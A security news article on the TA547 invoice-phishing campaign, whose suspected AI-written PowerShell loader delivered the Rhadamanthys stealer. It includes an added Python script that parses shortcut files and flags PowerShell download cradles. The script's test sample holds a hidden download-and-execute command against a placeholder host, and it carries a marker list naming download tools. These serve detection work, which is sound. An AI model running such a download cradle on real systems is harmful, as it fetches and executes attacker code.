Cybercriminals Leverage AI for Stealthier Attacks: Researchers Flag AI-Generated PowerShell Script

Researchers have uncovered a novel tactic employed by cybercriminals: leveraging Artificial Intelligence (AI) to craft malicious code. The culprit, a threat group known as TA547, is suspected of using AI to develop a PowerShell script designed to deploy malware.

PowerShell is a scripting language and shell that ships with every modern Windows release and is widely used for system administration. Attackers abuse it for the same reasons administrators value it: it is already present on the host, it is signed by Microsoft and trusted by most environments, and it can download further payloads and run them in memory without writing a new executable to disk. That makes it a common stage in malware delivery chains, where a short script fetches the real payload and launches it.

What sets this case apart is the look of the script rather than what it does. Researchers at Proofpoint identified it while investigating a recent TA547 campaign. The script, a loader that delivered the Rhadamanthys information stealer, carried a comment above almost every component, written in complete, grammatically correct sentences that explained what the following line did. Hand-written crimeware is usually terse and uncommented, or commented in a few words; this style of exhaustive, well-formed commentary is typical of code produced by a large language model.

There is no definitive proof of AI involvement, only a stylistic match: the script's characteristics align with the output of large language models such as ChatGPT or Copilot, which generate code from natural-language instructions. Proofpoint's working theory is that TA547 used such a tool to write the loader, or copied code that someone else had generated with one, most likely to save time. Two caveats apply. Formatting and commenting are weak attribution signals, since an author can ask a model to comment existing code or simply write in that style by hand. And whether a person or a model wrote the script changes nothing about its behaviour on the host, so the detections that catch a hand-written PowerShell loader catch this one too.

The campaign consisted of phishing emails sent to German organisations across a range of industries. The emails impersonated invoices from Metro, the German cash-and-carry retailer, and carried a password-protected ZIP archive; the password keeps mail gateways from inspecting the contents. Inside the archive was a Windows shortcut (.LNK) file. When a recipient double-clicked the shortcut, it launched PowerShell with the suspected AI-generated script, which downloaded the Rhadamanthys payload from an attacker-controlled server and executed it.
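The delivery chain above (ZIP → .LNK → PowerShell → download) is where a responder first gets a look at the attacker's code: the shortcut file stores the program it launches and the full command line in the StringData section defined by Microsoft's MS-SHLLINK specification. The following script, added here as an example and not code from the page or from Proofpoint, parses a .lnk file far enough to recover that command line and then flags shortcuts that start PowerShell with a hidden window, an execution-policy bypass, or download-and-execute markers. The sample shortcuts are constructed in the script itself with an illustrative command line and a reserved `example.invalid` domain; they are not the real TA547 artefacts, and the marker list is an assumption a team would tune to its own environment.

```python
"""Parse a Windows shortcut (.lnk) per MS-SHLLINK and triage its command line.

Added example: recovers the target and arguments stored in a shortcut's
StringData and flags PowerShell download-cradle patterns.  Sample shortcuts
are constructed below; they are illustrative, not real campaign artefacts.
"""
import struct

LNK_HEADER_SIZE = 0x4C
# CLSID {00021401-0000-0000-C000-000000000046} in on-disk (mixed-endian) layout
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK section 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields appear in this fixed order when their flag is set.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Assumed markers of a download-and-execute command line (tune per environment).
DOWNLOAD_CRADLE_MARKERS = (
    "downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
    "iex ", "invoke-expression", "net.webclient", "frombase64string",
    "-encodedcommand", "-enc ", "bitsadmin", "certutil",
)


def _read_string_data(buf, off, unicode):
    """Read one StringData entry: a 2-byte character count, then the characters."""
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    if unicode:
        raw = buf[off:off + 2 * count]
        return raw.decode("utf-16-le"), off + 2 * count
    raw = buf[off:off + count]
    return raw.decode("cp1252", errors="replace"), off + count


def parse_lnk(buf):
    """Return the StringData fields of a shell link as a dict (None when absent)."""
    if len(buf) < LNK_HEADER_SIZE:
        raise ValueError("file too short to be a shell link")
    header_size, clsid, flags = struct.unpack_from("<I16sI", buf, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a shell link (bad header size or CLSID)")
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # skip IDList: 2-byte size + body
        (id_list_size,) = struct.unpack_from("<H", buf, off)
        off += 2 + id_list_size
    if flags & HAS_LINK_INFO:                # skip LinkInfo: 4-byte size includes itself
        (link_info_size,) = struct.unpack_from("<I", buf, off)
        off += link_info_size
    unicode = bool(flags & IS_UNICODE)
    fields = {key: None for _, key in STRING_FIELDS}
    for flag, key in STRING_FIELDS:
        if flags & flag:
            fields[key], off = _read_string_data(buf, off, unicode)
    return fields


def triage_lnk(fields):
    """Flag a shortcut when PowerShell is launched with two or more hostile traits."""
    cmd = " ".join(v for v in (fields["relative_path"], fields["arguments"]) if v).lower()
    reasons = []
    if "powershell" in cmd or "pwsh" in cmd:
        reasons.append("target is PowerShell")
        if "-windowstyle hidden" in cmd or "-w hidden" in cmd:
            reasons.append("hidden window")
        if "-executionpolicy bypass" in cmd or "-ep bypass" in cmd:
            reasons.append("execution policy bypass")
        hits = [m.strip() for m in DOWNLOAD_CRADLE_MARKERS if m in cmd]
        if hits:
            reasons.append("download/execute markers: " + ", ".join(hits))
    # A plain PowerShell shortcut is normal for admins; require a second trait.
    return {"suspicious": len(reasons) >= 2, "reasons": reasons}


def build_sample_lnk(relative_path, arguments=None):
    """Construct a minimal .lnk (test data only): header + Unicode StringData."""
    flags = HAS_RELATIVE_PATH | IS_UNICODE | (HAS_ARGUMENTS if arguments else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    body = struct.pack("<H", len(relative_path)) + relative_path.encode("utf-16-le")
    if arguments:
        body += struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    return header + body


# Constructed samples: a loader-style shortcut and a benign one.
SAMPLE_MALICIOUS = build_sample_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "
    "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/loader.ps1')\"",
)
SAMPLE_BENIGN = build_sample_lnk(r"..\..\..\Program Files\Notepad++\notepad++.exe")

if __name__ == "__main__":
    for label, blob in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        fields = parse_lnk(blob)
        print(label, fields["relative_path"], fields["arguments"], triage_lnk(fields))
```

On a real case, read the extracted `.lnk` with `open(path, "rb").read()` and pass it to `parse_lnk`; the same parser also works on shortcuts recovered from `Recent` folders or mail quarantine. The triage rule deliberately requires two traits because administrators legitimately create PowerShell shortcuts; a hidden window or an execution-policy bypass combined with a download cradle is what separates a loader from a convenience shortcut.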

Rhadamanthys is an information stealer sold as malware-as-a-service (MaaS) and has gained traction in cybercrime circles since it first appeared in September 2022. Under a MaaS model the developer rents out a maintained payload and back-end to other criminals for a fee, so an operator such as TA547 only has to solve delivery; the stealer itself is someone else's product.

The suspected use of AI to write the loader is notable because it shows a criminal group treating code generation as a commodity: a model can produce a working download-and-execute script in seconds, and can rewrite it on demand, which lowers the cost of varying tooling between campaigns. What it does not do is make the malware harder to detect in the ways that matter. The shortcut still has to land in a mailbox, spawn PowerShell, reach out to a server and launch a stealer, and each of those steps is observable regardless of who or what wrote the script. Defenders should therefore not wait for a reliable "AI-generated" signature; behavioural detection of the delivery chain is the practical control.

The recommended precautions are unchanged: treat unexpected invoices with suspicion even when the sender looks legitimate, verify them through a channel that does not come from the email itself, and do not open attached archives or shortcut files. On the mail-gateway side, password-protected archives cannot be scanned and .LNK files have no business in invoice emails, so both can be quarantined or flagged before they reach a user.
